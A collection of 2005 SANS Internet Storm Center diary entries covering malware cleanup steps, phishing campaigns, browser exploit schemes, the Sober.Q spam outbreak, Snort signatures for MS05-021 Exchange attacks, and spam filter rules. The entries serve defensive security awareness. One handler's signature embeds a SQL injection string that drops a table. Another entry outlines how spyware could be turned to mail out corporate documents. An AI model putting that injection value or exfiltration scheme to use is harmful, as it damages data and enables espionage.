Third, run msconfig.exe (Start Menu -> Run -> msconfig.exe). Select the Services Tab and then check the box to "Hide All Microsoft Services". The remaining list of services will need to be checked for any programs you do not recognize. To disable any of these, uncheck them. Many of the services will be items like AntiVirus, Bluetooth and wireless service apps, printer and any other special services needed by your company (VNC, Backup Server software, etc). Others may be other bits of malware that looks similar to a real Microsoft service that would be easy to overlook. After exiting msconfig, I typically let my system reboot again to allow those changes to take affect.

Fourth, this is an excellent time to scan the computer with any AntiVirus and Spyware cleaner tools. Some of these tools do not like running in safe mode, so test this in your lab to see which tools you choose to use in the field.

Fifth, install and run BHODemon. BHODemon will show you all of the Browser Helper Objects that Internet Explorer will load at boot time. Some applications, such as Adobe Acrobat, Spybot Search and Destroy, and most IE Toolbars, will start from here. As any real executable content can be made into a BHO, one could have an almost clean system, then launch IE and suddenly have spyware or other malware attempting to be reinstalled. Uncheck any applications that BHODemon believes are malware and/or does not recognize. The benign items are probably safe enough to leave in place.

Sixth, reboot the system back into normal mode and run TCPView and Process Explorer. These 2 tools will allow you to watch the processes and the TCP/UDP connections your computer is performing. If you see much activity, then it may point you to applications that may have been missed in the first 5 steps. And chances are these are the items that need to be sent on to your favorite AV companies. If you would like to be nice and send it our direction via our <A HREF="http://isc.sans.org/contact.php"> contact page, we can also submit it to the AV companies which we have contacts.

Last, It may be safe to restart system restore at this time. Additionally, one should determine how the malware came into the computer. This will help you know where you need to better protect your systems in the future. Most of the botnet or other malware I have seen recently have come in through either a weak password on a local account, or through missing lsass/rpc patches. Perhaps your user caught the malware through a webpage, or IM. Perhaps the malware came through email, or a P2P application to the computer. You may be the best judge of it based on what you have found from the above steps.

Hopefully, you have been able to beat this wack-a-mole game with the malware at this point. Backup the users data and rebuild. Make sure that all patches are applied and all local user accounts have strong passwords. And if you can make the time, educate the user in how best to protect their computer.

Note:  The above is a procedure I have used many times on my campus. At 
some point, I plan to refine this a bit more using more concrete examples
with perhaps screen captures of some of these tools. If you have
suggestions of other tools that might be useful, let us know. If there
are other places that you have seen malware get automatically started,
please let me know that too!


Scott Fendley

Handler On Duty

sfendley _AT_ isc.sans.org


Published: 2005-05-23

eBay/Paypal Phishing; Shame on that prophet; iframeDOLLARS; Cyber Extortion; OSX hardening; Incident Responder Analysis Tools

eBay/Paypal phishing via vulnerable ZeroBoard software

While the Internet Storm Center has certainly been receiving an increasing number of eBay and Paypal phishing reports, there is now supporting evidence that identifies a particular attack vector responsible for enabling at least a subset of the growing distribution of this particular phishing email variant. Both the delivery of phishing email and the website that is setup for the harvesting of user credentials is being accomplished through a php inclusion attack on web servers running vulnerable versions of the ZeroBoard bulletin board software. A <A HREF="http://www.securityfocus.com/archive/1/387076">vulnerability disclosure</A> for versions 4.1pl5 and prior of ZeroBoard software was posted to bugtraq on Jan 13 2005. The author has apparently not provided an official patch, but public workarounds are included in the bugtraq disclosure. A personal recommendation is to please check all of your Internet accessible hosts for the existence of the ZeroBoard, being on the receiving end of this phish is annoying but it's that much worse knowing that people are actively falling for this scam. Responsible hosting providers and web administrators, there are even multiple Nessus plugins, ID#s 16059, 16178 and 17199 for those that would like to automate thier checks.

Shame on that prophet

As silly I believe this next report is, it may very well lead to financial loss via the baited harvesting of paypal user credentials. The Storm Center received a report from D. Craig Rich of a website at www dot prophetyaweh dot com recommending that new paying subscribers to his site use the same user id and password that they use on paypal. <SARCASM>Oh Really? I'm into UFO's and such, so here's my $7.95(USD), and while you're at it, just help yourself to the rest of my account balance.</SARCASM> Notice we did not link to the site from this diary entry, so please do yourself a favor and don't bother visiting this site. Recommendation: Never reuse passwords between sites. You never know who has access to your data.

iframeDOLLARS dot biz partnership maliciousness

After fellow Storm Center handler Tom Liston's investigation into a report received from a SANS ISC reader named Checker today, we find ourselves examining what appears to be an awful business practice based on the wholesale attempted exploit of Internet Explorer browsers via multiple vulnerabilities for any IE client that happens to visit a 'partner' in this business venture. The exploits are hosted via hundreds of unique URL's on the website at www dot iframedollars dot biz including the <A HREF="http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-014.asp"> (MS03-014) MHTML (.chm) exploit</A>, <A HREF="http://www.microsoft.com/technet/security/bulletin/MS03-011.mspx">(MS03-011) Java ByteVerify exploit</A>, <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx">(MS05-002) MS ANI exploit</A>, and an <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS04-013.mspx">Mhtredir trojan exploiting MS04-013</A>. The successful exploit of any browser would result in the installation of at least nine additional samples of malicious code including backdoors, trojans, and spy/adware. So how much is your compromised workstation worth to website administrators that participate in this revenue generation scheme? A whopping $0.61(USD).
LATE DIARY ADDITION: Michael Ligh wrote in notifying us of his involvement in investigating a compromise that involved an iframedollars partner. His excellent writeup is hosted on <A HREF="http://www.mnin.org/write/2005_trimode.html">Michael's personal website</A>.
The question is: How much satifaction can one organization achieve by null-routing all traffic to this host at

Answer: You tell us.

Cyber Extortion by client browser exploit

If the iframeDOLLARS business isn't enough, the Storm Center received an <A HREF="http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=194">alert</A> from Dan Hubbard at WebSense Security Labs of a Cyber Extorsion plot involving the encoding of workstation user data after the Internet user presumably had fallen prey to a <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS04-023.mspx">Microsoft Internet Explorer HTTP Help browser vulnerability (MS04-023)</A>. After workstation data is encoded, the user is presented with an extortion offer enabling the user to receive a tool that would decode captive data after delivering a payment of $200.00(USD) to the extorter via an online payment service. Windows users, don't you think that is a good enough reason to check whether you are patched for this and other recent vulnerabilities. Why not kick off a Windows Update after reading the rest of this diary entry?

Additional OSX hardening guide

Supporting the May 22nd diary which included a link to the NSA OSX hardening guide, John Banghart with the Center for Internet Security wrote in to identify the availability of the CIS OSX hardening guide available for download from <A HREF="http://www.cisecurity.org">http://www.cisecurity.org</A>.

Incident Responder Malware Capture, Control and Analysis tools

Hey you! Incident Responder! Yeah, You! A few tools in the toolbox that haven't been mentioned here recently which I've been having a great amount of success and fun with in capturing malware using <A HREF="http://www.mwcollect.org">mwcollect</A>. Mwcollect has been developed within the German Honeynet project and is the tool referred to from within the Honeynet project recent Bots paper. Once I've collected samples, and I determine that something is interesting enough to examine, quick analysis gains are to be had without heavy reverse engineering by performing runtime analysis, which I do in my own Malware Motel (Malicious code gets in, but it can't get out) which are just a few slight modifications to the Honeynet project's <A HREF="http://www.honeynet.org/tools/cdrom">Honeywall</A> which enables data and network controls and provides you with as limited of a live network environment as you want for analyzing malicious code. The Honeynet project released the updated next generation of the Honeywall on May 17th 2005.


Published: 2005-05-22

Mac Security; Anonymity with Tor; Web Vandals v. Phishers; Paypal Phish Conditioning

OS X Update, Mac Security

Apple's was released earlier last week. Among other things, this update fixes the oft-reported security issue surrounding the auto-install of widgets. I am of the opinion that the bulk of this vulnerability lies with the default configuration of Safari, which auto-runs "safe" file types once they are downloaded.

If you are running a Mac, go turn this off. Right now. (Safari -> Preferences -> General) I'll wait.

While I'm beating the drum of Mac security, let me point you to some other good source of Mac-sec information. First and foremost, we've got the extremely detailed
for OS X. After following this guide, your Mac should be reasonably secured against threats internal and external, foreign and domestic. The NSA guide is geared towards Panther, but most of the document should still apply to Tiger.

is covered in the NSA guide, but I think it deserves special mention, since in Tiger it is now actually useful, thanks to Tiger fixing the . Prior to this, an adversary with physical access to your Mac had a decent possibility of recovering your login password (which is used to unlock the encrypted FileVault volume) from swap. Since on-disk encryption is designed to protect sensitive data from adversaries with physical access, this meant that FileVault was more of a "disk access governor" than a security measure. Thankfully, this is no longer the case, so you can rest easy the next time you lose your $3000 PowerBook. While you're out 3K, at least your data is safe.

On non-server versions of OS X, the GUI firewall configuration utility leaves quite a bit to be desired. The GUI is really just a simplistic frontend to
. There is a pretty good Mac-oriented overview of ipfw .

I'm not certain if this issue has been or can be fixed by Tiger as I'm on my Panther machine right now, but there is a long-standing problem in the OS X world related to
. These holes are usually opened up by third party application installers, and allow simple malcode like the to elevate privilege on the system. Periodically checking your system for directories with vulnerable permissions is recommended.

For Mac security news and links, one of my favorite sites is
. It's the antithesis of an Apple site - no flash, no glitz, just info and links - which is why I think I enjoy it so much. There are a couple of books on the subject as well, if you prefer dead-tree media: Mac OS X Security and Maximum Mac OS Security. Mac OS X Security is a good read, and covers a lot of what I've talked about here and then some. I can't comment on the latter as I haven't read it, but if the title is any indication, it should be phenomenal. ;)

Tor Anonymous Network Reaches 100 Nodes

I generally try to avoid "announcements" in diaries, but bringing attention to
is a worthwhile end. Tor is an onion routing network supported by the EFF and managed by the . If you're not familiar with the concept of onion routing, it's explained very well .

To summarize, Tor is a fairly speedy anonymity network which you can tunnel arbitrary TCP connections through. While the bulk of Tor users are undoubtedly using it for anonymous web browsing, nearly any application that can use a SOCKS or HTTP proxy can be run through Tor, as evidenced by the
. I've been tunneling IRC and AIM through it recently and have had no issues. Web surfing gets a little strange when Google keeps switching languages based on the location of your last hop out of the Tor network, though. If you're concerned about your privacy online, give it a try.

Web Vigilantes v. Phishermen

According to a recent
web-site defacers have taken up virtual arms against phishing sites. As a resident of fabulous Las Vegas, Nevada, I can't help but think of listening to long-time Vegas residents wax nostalgic about how much nicer, safer, and cleaner the town was when the Mob ran the place.

Paypal Phishing Conditioning?

ISC reader TJ O'Grady reported receiving a legitimate password reset verification from Paypal. As he had not requested any reset, he contacted Paypal via telephone and was told that they were having technical difficulties and that he shouldn't worry about the email.

A few hours later, he received an Paypal phishing email suggesting that he log into his account as their had been unusual activity.

Have any other ISC readers experienced a similar combination of emails? Is TJ's circumstance simply a coincidence or have Paypal phishers begun a social engineering process of conditioning their marks into complying with later requests?

John Says Thanks!

Handler John Bambenek would like to thank everyone who submitted feedback in response to his
and apologizes for not responding to each of you individually.

That wraps up today's diary, kids! Until next time, I leave you with the following:

"It is difficult for a fool's habits to change to selflessness. In confronting a matter, however, if at first you leave it alone, fix the four vows in your heart, exclude self-interest, and make an effort, you will not go far from your mark."


Cory Altheide


Published: 2005-05-21

Microsoft time (cont.); Firefox exploits; PAWS exploit; port 445

Late Edition

Microsoft time (continued)

Just a quick update from . According to the Microsoft help system the protocol used is NTP and as such most likely your ISP already has a well connected NTP server for you. Please consider looking up how it is named (often it is ntp.<yourISP>.<tld>) and synchronize from that one. The decrease in network delay and the decrease in possibility for asymmetric routing and all the consequences on stability of the time on your machine(s) will be in your advantage, even after time.windows.com returns to service.

The NIST also maintains a
of which time.nist.gov is only one, you can use the others as well.

Considering how NTP normally works, you might also consider to install a more complete NTP implementation so that you can configure multiple servers for the client to choose from and not become dependent on just one server.

We received multiple suggestions to use pool.ntp.org's ntp servers (which can be set to your region/country). Bob Grabowsky suggested this URL:

Firefox 1.0.3 exploits released

K-Otik/FrSIRT has released 3 exploits against Firefox 1.0.3; If you haven't upgraded to 1.0.4, this is yet another good reason to do so without delay.

in a your preferred flavor. For a description of the problems, Mozilla has following URLs:


PAWS Exploit released

The same folks from France released also an attacking TCP connections under certain conditions. Those of us having critical infrastructure relying on the persistence of TCP connections should check with their supplier.

References: CAN-2005-0356

rBot.NT - port 445

iDEFENSE has been reporting on a spike in port 445 activity linked to rBot.NT .
The data for at Dshield currently cannot correlate with that analysis. The peak you see around the 13th is not related nor to be taken seriously in this respect.
Keep an eye out for the evolution in the next few day though.


Swa Frantzen
Published: 2005-05-20

Multiple Greeting Card scams; MSFT time server; Sober next Monday; Netscape 8.01; Pharming

Multiple Greeting Card Scams

We did get reports about a couple of greeting card scams. They use different
domains (bluemountain.com, 123greetings.com). It is important to note that
these scams use different domains. If you include greeting card scams in your
awareness training, make sure to point out that they may use less known domain
names as well.

Netscape 8.01

Yesterday's diary pointed out the release of Netscape 8.0. Well, today AOL
released a security update (version 8.01). Please make sure you download it.
While initial reports of >40 bugs turned out to be inflated, there are still a few issues (about 3-5) that are fixed in 8.01.

MSFT Time Server

We have one report and some personal observations that the default Microsoft time server (time.windows.com) is having problems. If you are using this time server (it is the default time server for Windows XP installs), make sure you are still able to connect, or let us know if you see any error messages.

Sober deadline for next monday

The version of Sober responsible for last weeks outbreak of German spam is said to trigger some as of now unknown payload on Monday, May 23rd. If you know what it will do, let us know. The messages are believed to relate to this weekends
elections in one of Germany's larger states.


Pharming: Does it exist? We do get ongoing requests for statistics about actual "Pharming Attacks". So far, the response has been easy: "None". While the DNS cache poisoning attack from a few months ago has been called "pharming" by some, it wasn't according to our definition of the term, as it did not attempt to spoof a bank site to obtain passwords. However, pharming is a rather new term, and like other new terms it may stretch itself until it finds a purpose.


Johannes Ullrich

jullrich@';drop table email;'sans.org'

SANS Institute


Published: 2005-05-19

Phederal Phishing Offenses (FBI and a Census report)

Contributors to the ISC effort have been sending in a load of information on issues affecting their systems and networks;

We have recieved two reports from contributors to the ISC efforts involving US federal agencies being used as the basis for phishing.

"PH"BI (FBI) phishing

One contributor submitted information on a hack involving a php flame module ending in a phishing scam. According to the submission he was notified that a co-worker "was looking at a notice claiming to be from the FBI that they were monitoring this range of IP addresses for suspicious activity regarding financial transactions" and sure enough at the end of the phish you were asked "that you re-enter your payment data to help them track the fraudsters." The site was reported to dish up the phish intermittently "as you could hit reload 10 times before it appears again". According to the contributor "The correct URL always appeared unchanged in the browser's address bar, but the content I was looking at was nowhere in the actual documentroot directory for that domain." The contributor asked for some assistance, and any contributor who cares to toss out recommendations on security issues related to "any configuration settings that would disallow modules from being loaded" will be thanked and I'll pass them on to the person who reported this "PH"BI (FBI) phish.

The second report involves the Census Bureau. It describes a complaint that was received where "the email recipient was asked to fill out a survey after which they would be credited $5 to their bank account. At the end of the survey they were asked what bank account they would like the money deposited in." If any of our readers comes into contact with users or customers that have received this phish please email us a copy as an attachment. Thanks!

Mailbag IM attack items and family variant naming contest

A number of the submissions were about IM attack malware resulting from users being socially engineered into downloading and installing malware. So many that checking your favorite AV sites a few times daily is a good idea. As noted on Kaspersky's Diary (link below) the variants are coming out pretty often and continue to have a costly impact at networks. The most interesting IM messages that I read included "hey, this your pic" and then "hey, is this your pic on this site." the contributor went on to point out that "These message lines are followed by a URL from a site that hosts a picture rating service. If the user clicks the URL, an application disguised as a server-side PHP script downloads. The application is a variant of the Agobot / SDBOT / GaoBot Trojan Horse, which opens a backdoor on the local machine and connects the user to BOT network.".

Another interesting one was ""lmao you dumbass!" (Thanks Ed!). I think both will generate quite a few infections ( ; ^ ). There are
already quite a few names for these IM attacks, but there's no family name in popular use yet that I've noticed. Since "spam" is a meat, and lead to "spim", and since Oscar is in a name of a relatively famous meat product and it's also used in the name of malware directed at AOL IM users (Oscarbot) I was tossing around ideas for a "family" convention for this malware, something along the lines of a name variation of "Oscar Mayer IM" (as in B O L O G N A!) but that doesn't have real cachet. Other ideas for naming this family of IM attacks would be welcome, and I have to warn you, that based on previous submissions to other questions that we have asked, I will not be able to respond to each and every suggestion we'll recieve. But I'll try and get the best ones posted into a future Diary.

IM's in Kaspersky's "Analyst's

New Mytobs, and generic detections at http://www.viruslist.com/en/weblog

More on Social Engineering:

Security Update for MSN Messenger 6.1 or 6.2 (KB890261)
"A security issue has been identified that could allow an attacker to compromise your Windows-based system and gain control over it."

**NOTE** This is NOT the "Apr 12, 2005 Vulnerability in MSN Messenger Could Lead to Remote Code Execution (896597): MS05-022 Affected Software: MSN Messenger 6"

An additional note of clarification for another MS patch, we have been advised that "The issue described in Microsoft's Security Advisory (899480) is related to a Windows TCP/IP implementation flaw
http://www.frsirt.com/english/advisories/2005/0567 and NOT the IPv6 flaw which remains unpatched. See http://www.frsirt.com/english/advisories/2005/0559 "
Thanks Gilles!

I've included the link next/below for a number of reasons, principally because it's a stellar example of comprehensive information on what the malware does, thus it allows you to consider where you can implement the most detect/protect/response options suitable for your environment. Getting your own "team" to consider implementing the options is always another story. IMHO there are only a few or so vendors that publish analysis that is this good and I'd just like to thank the people at F-Secure and the other few that do this for setting such a high standard.
NAME: Sober.Q

"The All New Netscape Browser 8.0
Speed, Flexibility and More Security Choices Than Any Other Browser" Thanks Juha Matti!


Patrick Nolan, with other Handler assists and our great team of contributors!


Published: 2005-05-18

Insider threat study, and Fun in the trenches, Windows surprise update, Why is change control a good idea?

An interesting report came out of the CMU CERT

Insider Threat Study: Computer System Sabotage in Critical Infrastructure Sectors

Thanks Adrien for pointing this out.

Windows update

A new Windows Installer 3.1 has appeared in Windows update and an SUS server near you. Unannounced (as far as I am aware). Not really a security issue but it could be.

Some fun in the trenches or Why change control?

What happens when you install something new on your network and then you begin to have problems? You blame the something new right? What about when the something new is having problems and then new problems appear? You again blame that something new, especially when the something new is a firewall right? Well, it is not always the firewall's fault. If you do not know who is plugging things into your network, you'd better find out now.

Company X bought some shiny new firewalls and had a consultant put them in. Now Company X has nice shiny VPNs connecting them to their messaging and file storage with a fancy low cost WAN. Wow everything is great. Then after some packet loss, and some other issues ,the VPNs were deemed really nice but not perfect. After a few adjustments they could live with it though.

...And then bang one site starts to have intermittent connectivity loss. In fact the default gateway starts to generate ICMP Network Unreachable messages for anything off site. This comes and goes. What could that be? Well after the new firewalls get their thrashing for being the bad newguys on the block, it is time to get out your packetsniffer and look at who is sending those ICMP messages 'cause it is not the default gateway.

If anyone can plug anything they want into your network, they will and if that thing happens to be a Linksys router with the same IP address as your default gateway, then you might see these ICMP net unreachables from some other MAC address than the default gatway.

Okay so this is basic stuff, whats the point? Part of the C-I-A triad is availability, if anyone can take your network down with a simple IP conflict then you are at risk. What else are you at risk for? The simplest resolution is to implement change control. This means many things to many people, for some in large corporations it means 24 hour follow the sun meetings, for others it means that someone approves any changes to the network before they are made and that each change is recorded and verified. This way, that new network printer does not get blamed when the VPNs go down.

Dan Goldberg
MADJiC Consulting, Inc.
dan /@/ madjic /dot/ net


Published: 2005-05-17

Corporate Espionage Made Easy with Spyware; Honeynet KYE: Phishing paper Published; Some New Vulnerabilities

Corporate Espionage Made Easy with Spyware

For now most spyware (of the more malicious variety) simply tries to passwords to banking sites, social security numbers, and the like. This is part of the ongoing trend of malicious online activity being driven by money. Spam would not be taking place if people were not making money off of it. The only reason you would want to steal someone's online banking information is for the money in it. Here's a new scenario, one I think we'll be seeing sooner or later.

- Take standard spyware that installs a keylogger.

- Throw the keylogger part out.

- Put in easily coded software that will mail out any documents (.xls, .doc, etc) that it finds on the system.

- Threshold the software so it either doesn't kill the mail server and escapes detection, or make it send all of it at once hoping the human response time won't be fast enough to stop it.

You can tighten the example anyway you want. Have the software only work if the system is on a certain domain (say .microsoft.com), have it send only on weekends when people are less likely to notice a slow machine or lots of e-mail, etc. If you are an organization that has trade secrets or confidential information do you monitor and/or control what e-mails make it out of your organization? You should start. I haven't seen any real-world examples, if you have let me know. Also send me feedback and your thoughts (bambenek -at- gmail -dot- com).

Honeynet KYE: Phishing paper Published

The Honeynet projected published a "Know Your Enemy: Phishing" paper today. The paper focuses on observed examples and goes in-depth to analyze the intent and method of phishers in getting information. The paper is available here:

Some New Vulnerabilities

None are huge issues but shouldn't be left unaddressed.

- Microsoft Windows XP/2003 IPv6 Remote Denial of Service Exploit

- Linux Kernel 2.6.x "ioctl_by_bdev()" Local Denial of Service Exploit

- procps vmstat "p" Argument Local Stack Overflow PoC Exploit

- Gaim 1.2.x URL Handling Remote Buffer Overflow PoC Exploit


John Bambenek

bambenek -at- gmail -dot- com


Published: 2005-05-16

German Spam (concise version); MS05-021 and Snort Signatures; Is it a security problem?

<H3>German Spam (Concise Version)

These first two sections were provided by yesterday's handler on duty, Scott Fendley. Thanx, Scott.

As there is still many email coming in concerning the German Spam diary yesterday, We are going to provide a little more concise version of the information (or as concise as I can be). The longer version of the diary is located at http://isc.sans.org/diary.php?date=2005-05-15 .

On Saturday evening (Sunday Morning UTC), a large number of "German Spams" were sent all over the world. As the details of this unfolded (see http://www.viruslist.com/en/weblog for the initial analysis), it was discovered that a recent variation of the Sober virus had downloaded new functionality and was proceeding with spamming political propaganda to any addresses gathered from the infected computer. Many anti-virus companies are calling this new malware as Sober.Q. A (mostly) complete list of anti-virus references will follow this brief.

The spammed email do not at this time appear to have any viral content, just links to German based websites that have been characterized as pro-neonazi, racist, anti-immigrant and/or generally right-wing extremist. The timing of this attack coincides with an election in the state of Northrhine-Westfalia and also the end of World War II in Europe and may serve as the motivation for the spam. As the virus does not appear to do any filtering of email addresses to direct it to only German speakers, or even the German .de top-level domain, many networks have reported receiving a staggering number of email in other parts of the world.

Last year, the Sober.G virus was also used to spam political content prior to the European Parliament election. More recently, Sober.N was used to infect computers while enticing the recipient that they had won World Cup soccer tickets for 2006 which may have been

In yesterday's diary, Eric Conrad kindly provided postfix regex, and spam assassin rules that could be useful in stemming the impact of this junk email using the common subject lines. Additionally, Dirk Mueller also released a filtering technique that does not rely on the subject lines. Please take a look at http://isc.sans.org/diary.php?date=2005-05-15 near the 20:30 UTC update for this information.

Some users have reported mini Denial of Service attacks due to the German spam involving the email based text messaging on cell phone and blackberry devices. Others have seen large amounts of bounced email as the virus forges the from address of email it sends out.

Antivirus Links:







Update: 2005-05-17 17:15 UTC

Several of our readers have pointed out, that filtering based on the URLs in the body of the e-mail has proven more effective than filtering on the subject lines, since the subject lines seem to change more rapidly, while the URLs in the body have remained static. We just wanted to pass this info on to those still fighting significant amounts of this spam. Also, another of our readers, Frank, has had excellent success by looking at some of the other headers generated by the Sober.Q SMTP engine. See http://www.viruswatch.nl/info/soberq_filter.html for more info on this technique.

<H3>MS05-021 and Snort Signatures

Today, one of the Unisog readers posed a question to me (Scott still) about wether anyone else had seen been seeing exploitation of MS05-021 recently. At the time, I did not have a snort signature so I had not seen it. Hugues De Payens threw one together and later found that Erik Fichtner had added one to Bleeding-Edge Snort (which is below).

So as you can tell, I have been a bad handler by not keeping my signatures up to date in snort. I guess I will get slapped on the hand with a ruler by the school marm of the Storm Center soon. But I digress...

So is anyone seeing active wide-spread attacks against machines using the MS05-021 vulnerability?

For more information about the exploit, please see: http://www.securiteam.com/exploits/5XP0F2KFGA.html

The series of Bleeding Edge Snort Sigs (thanks to http://www.bleedingsnort.com/ )

alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"BLEEDING-EDGE EXPLOIT MS05-021 Exchange Link State - Possible Attack"; content: "X-LINK2STATE"; nocase; flow:to_server,established; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001848; rev:2;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 691 (msg:"BLEEDING-EDGE EXPLOIT MS05-021 Exchange Link State - Possible Attack"; content:"X-LSA-2"; nocase; flow:to_server,established; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001849; rev:2;)

alert tcp any any -> $SMTP_SERVERS 25 (msg: "BLEEDING-EDGE EXPLOIT MS Exchange Link State Routing Chunk (maybe MS05-021)"; content:"X-LINK2STATE"; nocase; content:"CHUNK="; nocase; flow:to_server, established; flowbits:set,msxlsa; threshold: type limit, track by_src, count 1, seconds 60; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001873; rev:3;)

alert tcp any 25 -> $EXTERNAL_NET any (msg:"BLEEDING-EDGE EXPLOIT TCP Reset from MS Exchange after chunked data, probably crashed it (MS05-021)"; flags:R; flowbits:isset,msxlsa; flowbits:unset,msxlsa; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001874; rev:3;)

pass tcp $SMTP_SERVERS 25 -> any any (msg:"BLEEDING-EDGE EXPLOIT MS Exchange chunks accepted"; content:"200 DONE"; nocase; flowbits:isset,msxlsa; flow:from_server,established; flowbits:unset,msxlsa; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001875; rev:3;)

alert tcp $SMTP_SERVERS 25 -> any any (msg:"BLEEDING-EDGE EXPLOIT MS Exchange disliked link state chunk, but didn't die (MS05-021)"; content: "500 DROP"; nocase; flowbits:isset,msxlsa; flow:from_server,established; flowbits:unset,msxlsa; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001876; rev:3;)

Is it a security problem?

Jim here with a few thoughts from my day job. This weekend/morning was not a good one for hardware. I had both a server and a firewall suffer from disk problems. The firewall is a small appliance for a remote office (the disk is virtually inaccessible and it is easier to replace the entire appliance than just the disk). It is a model that is no longer manufactured, thought it is still "under service." We've been seeing disk errors in the logs since Friday, so we contacted our service provider and they shipped out a newer model. Unfortunately, when the new box arrived on site, the power cord that was shipped with it, didn't work with that model. So, they are finding another of the older model and shipping it out, it should arrive on site momentarily. Sigh.... Fortunately, the machine has remained up since being power cycled this morning. Is it a security problem? It isn't malware or an intrusion, but when it goes, this remote office is off the air.

We also had a disk go bad on a server over the weekend. We were doing all the right things, the disks were mirrored and (supposedly) hot-swappable. The maintenance provider was called out and came to replace the disk. Unfortunately, our logs show that within one second of the hot-swappable disk being plugged in, we start showing errors on the 3 other disks in the machine. The machine, that had still been running on the mirrored disks, came down hard at that point. I guess the moral of this part of the story is that just because a device/component claims to be hot-swappable doesn't mean it works that way in real life. Fortunately, the tech on site was able to get the machine back up in relatively short order. With all this excitement on the day job, it is probably a good thing that most of the e-mail to the handlers today was related to the German spam and Scott has handled that admirably. Thank you again, Scott.


Scott Fendley and Jim Clausing, sfendley and jclausing, respectively (@isc.sans.org)


Published: 2005-05-15

German Spam...Maybe?; Academia Security Awareness

German Spam...Maybe?

Since taking over as handler on duty, I have had a perplexing question that I am trying to understand. Somehow in the past 4-5 hours (as of 5am UTC), I have received a number of "German spams". Getting spam is not an overly out of the ordinary thing for me as I do sift through many mailing lists and work email address aliases that are published on websites here and there. However, I do not remember the last time I had a German Spam show up in my inbox. Chinese, or other Southeast Asian spams do happen some, but I would suspect that English is the primary type of spam we all see.

Well the thing that has struck me is that several of my accounts have now received maybe 15 or 20 different German spams. Each message involves a different set of URLs and has URL(s) to various German news are personal editorial sites (I think).

My real question is whether or not something odd on the web pages people may be clicking on or in the email? So far I do not see anything odd (like IFRAME junk or similar.) So is there a piece of malware that is being used to relay this junk. I suspect so. But what is it? No clue. Is there any other motives other then to spam it out? I don't see a money trail, but that does not mean it is not there.

So to our readers, has anyone else seen a sudden influx of what might outwardly look like German Spam, that may actually have some actual interesting security connections that we need to be aware of before Monday gets here?

Any of you know of a new piece of malware that might be causing some of this, or perhaps old botnet machines being used as spam proxies suddenly?
Updated 13:00 UTC --

It would appear that this may be related to the Sober.Q virus per


Thanks to everyone that responded this morning (overnight for me) with comments and reports of seeing the same thing that I was.

Updated 14:00 UTC --

Some of our readers, who understand German, have visited the sites being sent out and have reported the gist of the content on these sites. As this is 60th Anniversary of the end of World War II, there are many celebrations in some locations There is a lot of respects ceremonially given to those who fought in this war and gave up their lives on the battle field in many European countries. So, many of the sites appear to be related to "antiracism and nazis propaganda". Others have mentioned that this is the "extreme right wing", "Nazi views", and "NeoNazi propaganda." As I do not read German, I cannot verify this. But I am going to trust our German- speaking friends in that respect. But this does remind me of Sober.G from last year.
Another reader (or 3) appears to have had mini-DoS attacks on cell phones and blackberries involving the German Spam involving SMS. Thanks to Jim Mejia and Rich for your reports. For readers that pay to receive text messages on their phones, I highly recommend talking to your provider and make sure you will not have to pay for this junk email that was not filtered out. Thankfully, my provider only charges when I send text messages out so I will not have to deal with a unusually bloated bill.
Updated 15:00 UTC --

One of our readers, Eric provided a postfix regex file that can be used to filter these German spams. Thanks for this Eric.

*** As thes postfix regex file has had several more subject lines added to it in the following update. I have removed this section and place the current most info in the next update section. ***
Updated 20:30 UTC --

This will probably be the last update I will do on the subject of the German spam. As this is the 60th anniversary of the end of WWII, I had guessed that the propoganda was more in response of the events of many years ago. It may still be related, but several of of German Speakers have noted a couple of details that might point the motivation in another direction. Apparently there is an election coming up in the largest population state in Germany on May 22nd. The Diet election (Landtagswahl) in Nordrehein-Westfallen appears to be the most likely case as Sober.G last June also had an element of spamming associated with it prior to the European Parliament election in 2004. Thanks to Philipp Krenn for some of the information about the current election connection.

*I really hope that people are not so naive to be swayed in their votes for their elected officials on account of spam. And I will never trust the political views of a malware writer. So I hope and pray that if the virus and spam was meant to sway the votes of the people in the way that the Madrid terrorist activity last year did, then the people of Germany would have the courage and wisdom to vote as the truly believe. Not the way others would have them believe.*
During the 1500 update, Eric Conrad sent in a set of subject line filters for postfix. Later he sent an updated list, and both the original list and the updated list showed up on http://www.dslreports.com/forum/remark,13410941 . Thanks Eric for supplying this.

The postfix regex file is typically enabled via the main.cf of postfix like this.

header_checks = regexp:/usr/local/etc/postfix/headfilt.regex

And the contents of this file, I believe involves tab delimiting (which the diary doesn't maintain easily). So please be aware you may have to put a tab or something between the subject and the HOLD command.

----- headfilt.regex file contents -------

/^Subject:.*Armenian Genocide Plagues Ankara/ HOLD

/^Subject:.*Augen auf/ HOLD

/^Subject:.*Auslaender bevorzugt/ HOLD

/^Subject:.*Auslaenderpolitik/ HOLD

/^Subject:.*Blutige Selbstjustiz/ HOLD

/^Subject:.*Can you believe this still happens today/ HOLD

/^Subject:.*Deutsche Buerger/ HOLD

/^Subject:.*Deutsche werden kuenftig beim/ HOLD

/^Subject:.*Dresden 1945 / HOLD

/^Subject:.*Dresden Bombing Is To Be Regretted Enormously/ HOLD

/^Subject:.*Du wirst ausspioniert/ HOLD

